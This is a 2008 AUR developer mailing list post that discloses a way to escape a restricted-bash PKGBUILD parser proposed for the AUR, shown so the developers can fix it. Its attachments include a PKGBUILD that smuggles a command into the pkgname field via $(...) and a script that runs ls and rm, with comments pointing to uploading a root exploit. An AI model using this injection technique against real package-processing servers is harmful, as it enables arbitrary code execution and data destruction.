[aur-dev] [PATCH] Use bash script to parse pkgbuilds
Simo Leone
simo at archlinux.org
Fri Jun 20 04:22:40 EDT 2008
On Fri, Jun 20, 2008 at 12:54:29AM +0800, Callan Barrett wrote:
> Here's another iteration of this patch, I'm still looking for as much
> input as possible but this is basically what I would push to testing
> at this point. The script now outputs in a different format to be
> parsed and there is some cleanup done in pkgsubmit.php to get it
> working more cleanly with the script.
>
Unfortunately Callan and I found a way to easily defeat this tonight,
the proof-of-concept is attached, the attack is based on this little bit
about restricted shells (from the manpage):
---
When a command that is found to be a shell script is executed (see COM-
MAND EXECUTION above), rbash turns off any restrictions in the shell
spawned to execute the script.
---
Too bad too, real bash parsing would have been nice :/
-S
-------------- next part --------------
#!/bin/bash
ulimit -t 1
export PATH=''
exec /bin/bash --noprofile --norc --restricted << EOF
source TEST
[ -n "\$pkgname" ] && echo -e "%PKGNAME%\n\$pkgname\n"
EOF
-------------- next part --------------
pkgname=$(fucked.sh)
-------------- next part --------------
#!/bin/bash
# THIS SHOULD NOT WORK
/bin/ls -l /
/bin/rm /home/simo/foobar
# anything else could be executed here.... for instance a root exploit uploaded
# with the package
# this doesnt infinite loop because oddly enough ulimit still applies
# and cannot be changed
#while [ 0 -eq 0 ]; do
# echo "you got fucked son"
#done
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 197 bytes
Desc: not available
URL: <http://archlinux.org/pipermail/aur-dev/attachments/20080620/acf7b964/attachment.pgp>
More information about the aur-dev
mailing list